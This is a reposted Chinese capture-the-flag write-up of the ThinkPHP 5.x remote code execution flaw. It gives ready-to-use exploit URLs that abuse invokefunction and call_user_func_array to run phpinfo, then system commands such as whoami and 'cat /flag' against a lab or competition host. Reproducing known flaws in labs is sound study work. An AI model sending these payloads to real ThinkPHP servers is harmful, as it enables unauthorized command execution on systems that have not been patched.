CTF-攻防世界-web-php_rce(ThinkPHP5.x < 5.1.31, <= 5.0.23)

本文轉載自查看原文 2020-09-23 13:32 556 漏洞復現類/ ctf

ThinkPHP 命令執行漏洞5.x < 5.1.31, <= 5.0.23

這是一個遠程代碼執行漏洞，先學習vulhub復現這個漏洞的過程：

輸入：http://your-ip:8080/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1，可執行phpinfo：

拉到頁面底部，看到ThinkPHP的版本是5.0.20：

可以執行phpinfo，那可不可以執行其他命令呢？查了一下網上的payload，如下：

輸入：http://your-ip:8080/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

返回：www-data www-data

http://220.249.52.133:49560/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat /flag 得到答案

本站轉載的文章為個人學習借鑒使用，本站對版權不負任何法律責任。如果侵犯了您的隱私權益，請聯系本站郵箱yoyou2525@163.com刪除。

猜您在找 CTF-攻防世界-web-php_rce(ThinkPHP遠程代碼執行) 攻防世界-web-php_rce（ThinkPHP 5.0命令執行漏洞） CTF-攻防世界-Web_php_include(PHP文件包含) CTF-攻防世界-PHP2(PHP源碼) CTF-攻防世界-unserialize3(PHP序列化) CTF-攻防世界-supersqli(sql注入) thinkphp5.x系列 RCE總結攻防世界（四）php_rce CTF-攻防世界-WEB新手練習區 Writeup（12題入門題） ThinkPHP(5.1.x ~ 5.1.31 5.0.x ~ 5.0.23)GetShell漏洞